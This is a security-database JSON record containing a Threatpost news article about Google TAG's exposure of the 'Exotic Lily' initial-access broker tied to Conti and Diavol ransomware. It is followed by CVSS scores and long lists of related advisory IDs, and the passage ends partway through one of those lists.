DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops", "description": "Google\u2019s Threat Analysis Group (TAG) has provided a rare look inside the operations of a cybercriminal dubbed \u201cExotic Lily,\u201d that appears to serve as an initial-access broker for both Conti and Diavol ransomware gangs.\n\nResearchers\u2019 analysis exposes the business-like approach the group takes to brokering initial access into organizations\u2019 networks through a range of tactics so its partners can engage in further malicious activity.\n\nWhile ransomware actors tend to get most of the attention, they can\u2019t do their dirty work without first gaining access to an organization\u2019s network. This is often the job of what are called initial-access brokers (IABs), or \u201cthe opportunistic locksmiths of the security world,\u201d as Google TAG calls them in [a blog post](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) published Thursday.\n\n\u201cIt\u2019s a full-time job,\u201d Google TAG researchers Vlad Stolyarov and Benoit Sevens wrote in the post. \u201cThese groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\u201d\n\nGoogle TAG first encountered Exotic Lily last September, when the group was doing just that \u2014 exploiting the [zero-day Microsoft flaw](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) in MSHTML ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)) as part of what turned out to be a full-time IAB business \u201cclosely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol,\u201d researchers wrote.\n\nAt the peak of the group\u2019s activity, Exotic Lily \u2014 which researchers believe is working with the Russian cybercrime gang known as FIN12, [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) or DEV-0413 \u2014 was sending more than 5,000 emails a day to as many as 650 targeted organizations globally, they said.\n\n\u201cUp until November 2021, the group seemed to be targeting specific industries such as IT, cybersecurity and healthcare, but as of late we have seen them attacking a wide variety of organizations and industries, with less specific focus,\u201d researchers wrote in the post.\n\n## **Soup to Nuts**\n\nExotic Lily works ostensibly as a full-time cybercrime business, which might be described as a \u201csoup to nuts\u201d organization if it were actually a legitimate company.\n\nThe group has maintained a \u201crelatively consistent attack chain\u201d during the time it was being tracked by researchers with its operators \u201cworking a fairly typical 9-to-5 job, with very little activity during the weekends,\u201d researchers wrote. Working hours indicated that the group is likely operating out of a Central or Eastern European time zone.\n\nThe group\u2019s tactics include initial activity to build fake online personas\u2014including social-media profiles with AI-generated photos\u2014that spoof both identities and company domains to ensure it appears as an authentic entity to its targets when carrying out phishing, researchers revealed.\n\nIn fact, in November, Google TAG observed the group impersonating real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\n\u201cIn the majority of cases, a spoofed domain name was identical to a real domain name of an existing organization, with the only difference being a change of TLD to \u201c.us\u201d, \u201c.co\u201d or \u201c.biz,\u201d researchers wrote.\n\n## **Full-Time Phishing Business**\n\nWhile bug exploitation is part of its work as noted, Exotic Lily\u2019s main business operation is to use these spoofed email accounts to send [spear-phishing](<https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/>) emails. They often purport to be a business proposal, such as seeking to outsource a software-development project or an information-security service.\n\nOne unique aspect of the group\u2019s method is to engage in more follow-up communications with targets than most cybercriminals behind phishing campaigns typically do, researchers observed. This activity includes operators\u2019 attempting to schedule a meeting to discuss a project\u2019s design or requirements or engaging in other communication to gain affinity and trust, they said.\n\nIn its final attack stage, Exotic Lily uploads an ultimate payload to a public file-sharing service such as TransferNow, TransferXL, WeTransfer or OneDrive, and then uses a built-in email notification feature to share the file with the target.\n\nThis tactic serves to help the group\u2019s malicious motives evade detection, as the final email originates from the email address of a legitimate file-sharing service and not the attacker\u2019s email, researchers noted.\n\n## **Payload Delivery**\n\nTypically, the actors upload another group\u2019s malware to the file-sharing service prior to sharing it with the target, researchers said. While some samples of malware appear custom, Google TAG doesn\u2019t think it\u2019s Exotic Lily who\u2019s developing these binaries.\n\nThough their first observation of the group was the use of documents exploiting the MSHTML bug, researchers later observed Exotic Lily changing its delivery tactics to use ISO archives that include shortcuts to the [BazarLoader dropper](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), according to the post.\n\nThis month, Google observed the group delivering ISO files with a custom loader that drops malware dubbed Bumblebee, which uses Windows Management Instrumentation (WMI) to collect various system details such as OS version, username and domain name. These details are then exfiltrated in JSON format to a command-and-control server (C2), researchers said.\n\nBumblebee also can execute commands and code from the C2, and in recent activity was seen fetching Cobalt Strike payloads to be executed on targeted systems, they added.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "published": "2022-03-18T14:49:01", "modified": "2022-03-18T14:49:01", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/", "reporter": "Elizabeth Montalbano", "references": ["https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", "https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/", "https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/", "https://threatpost.com/bazarloader-malware-slack-basecamp/165455/", "https://bit.ly/3Jy6Bfs"], "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "immutableFields": [], "lastseen": "2022-03-18T14:56:17", "viewCount": 164, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0554", "CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-3100", "CVE-2021-40444", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "0990FE6E-7DC3-559E-9B84-E739872B988C", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "111C9F44-593D-5E56-8040-615B48ED3E24", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24DE1902-4427-5442-BF63-7657293966E2", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6BC80C90-569E-5084-8C0E-891F12F1805E", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B9A69678-D96F-528D-B436-366259B4A283", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3C6029E-8A78-5C0B-9CF6-51489E455464", 